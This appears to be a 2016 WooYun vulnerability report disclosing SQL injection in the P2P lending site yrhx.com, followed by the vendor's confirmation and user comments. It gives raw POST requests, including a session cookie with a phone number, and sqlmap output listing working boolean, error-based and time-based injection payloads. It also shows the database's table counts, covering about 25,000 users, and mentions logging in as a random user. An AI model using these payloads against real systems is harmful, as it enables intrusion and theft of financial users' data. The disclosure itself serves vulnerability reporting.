当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193225

漏洞标题:P2P金融易容恒信存在注入漏洞(25000多条用户数据泄露)

相关厂商:yrhx.com

漏洞作者: Nelion

提交时间:2016-04-06 22:29

修复时间:2016-04-06 23:37

公开时间:2016-04-06 23:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-06: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT
主站存在注入漏洞,泄露25000多条用户敏感数据。

详细说明:

一、注入点:
1、maxLimit参数和minLimit参数:

POST /queryLoanTransfer HTTP/1.1
Content-Length: 328
Content-Type: application/x-www-form-urlencoded
Cookie: d3e5feae0a8c7b3e_1=2cf629b810faa989c0bd98a7e0a8ace8530fa861303e770a71928c8cd4ae8fa15254b4c934422755dd1da560cfc812095b3a8d0c925e7963d1275164c311c83f; Hm_lvt_466bbed2607a2b7a987635d0100b0cdb=1459935725; Hm_lpvt_466bbed2607a2b7a987635d0100b0cdb=1459935726; loginName_16897=18649803761; userCode_16897=f332189388914d6da199cd6fabf3880e; userName_16897=test555; _jfinal_captcha=91295400e18fabbca30c6a704cbd9a23; HMACCOUNT=A9B0A6E71CF9B056; __cuid=14599352980540950; __bc_last=1459935298054; navStatus_16897=3
Host: www.yrhx.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
maxLimit=&minLimit=&pageNumber=1&pageSize=10


2、type参数:

POST /queryNewsByPage HTTP/1.1
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.yrhx.com:443/
Host: www.yrhx.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
isContent=1&pageNumber=1&pageSize=5&type=


3、工具sqlmap注入结果:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: maxLimit (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: maxLimit=-7964 OR 7345=7345#&minLimit=&pageNumber=1&pageSize=10
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: maxLimit=-8733 OR 1 GROUP BY CONCAT(0x7176627171,(SELECT (CASE WHEN (1516=151
6) THEN 1 ELSE 0 END)),0x7162787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&minLimit=&pageNumber=
1&pageSize=10
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: maxLimit=(SELECT (CASE WHEN (8160=8160) THEN SLEEP(5) ELSE 8160*(SELECT 8160
FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&minLimit=&pageNumber=1&pageSize=10
---
do you want to exploit this SQL injection? [Y/n]
[18:28:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12

漏洞证明:

二、数据信息:
1、所有数据库:

available databases [3]:
[*] information_schema
[*] test
[*] yrhxdb


2、当前库yrhxdb中的表及数据量:

Database: yrhxdb
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| t_funds_trace      | 1941831 |
| t_sms_log          | 180224  |
| t_recharge_trace   | 179947  |
| t_bizlog           | 165616  |
| t_loan_trace       | 141064  |
| tmp_tender         | 134564  |
| t_withdraw_trace   | 66073   |
| t_history_recy     | 52032   |
| t_location         | 46462   |
| t_funds            | 25857   |
| t_user             | 25857   |
| t_user_info        | 25857   |
| t_banks            | 13044   |
| t_auto_loan_v2     | 10216   |
| t_loan_transfer    | 8596    |
| t_loan_info        | 8501    |
| t_banks_v2         | 5593    |
| t_share            | 5087    |
| tmp_user           | 3563    |
| t_loan_apply       | 645     |
| t_loan_notice      | 564     |
| t_auto_loan        | 560     |
| t_market_user      | 173     |
| t_notice           | 74      |
| t_auth_log         | 58      |
| t_settlement_early | 58      |
| t_menu_v2          | 45      |
| t_op_user_v2       | 38      |
| tmp_xxs1           | 15      |
| t_tickets          | 8       |
| t_market           | 5       |
| t_sys_config       | 5       |
| t_sys_funds        | 1       |
| view_syscount      | 1       |
+--------------------+---------+


2、当前库中用户表中某些字段的数据(部分截图):

数据.png


3、随便拿一个用户登录一下看看:

登录.png

修复方案:

参数过滤

版权声明:转载请注明来源 Nelion@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-06 22:33

厂商回复:

已确认漏洞存在,非常感谢!
请联系我,有礼品!

最新状态:

2016-04-06:已加急处理了!

漏洞评价:

评价

  1. 2016-04-06 19:25 | 心云 ( 普通白帽子 | Rank:284 漏洞数:80 | 有目标,就有进步)

    我狗可以的 P2P杀手

  2. 2016-04-06 20:45 | Nelion ( 实习白帽子 | Rank:85 漏洞数:36 | 老实,腼腆,潜力股;不谈情,不说爱,只泡...)

    @心云 别走!劳资顺着网线去打死你!!

  3. 2016-04-06 22:19 | 心云 ( 普通白帽子 | Rank:284 漏洞数:80 | 有目标,就有进步)

    @Nelion 来 我保证不砍死你

  4. 2016-04-07 09:21 | 心云 ( 普通白帽子 | Rank:284 漏洞数:80 | 有目标,就有进步)

    @Nelion 不错 我狗 有礼物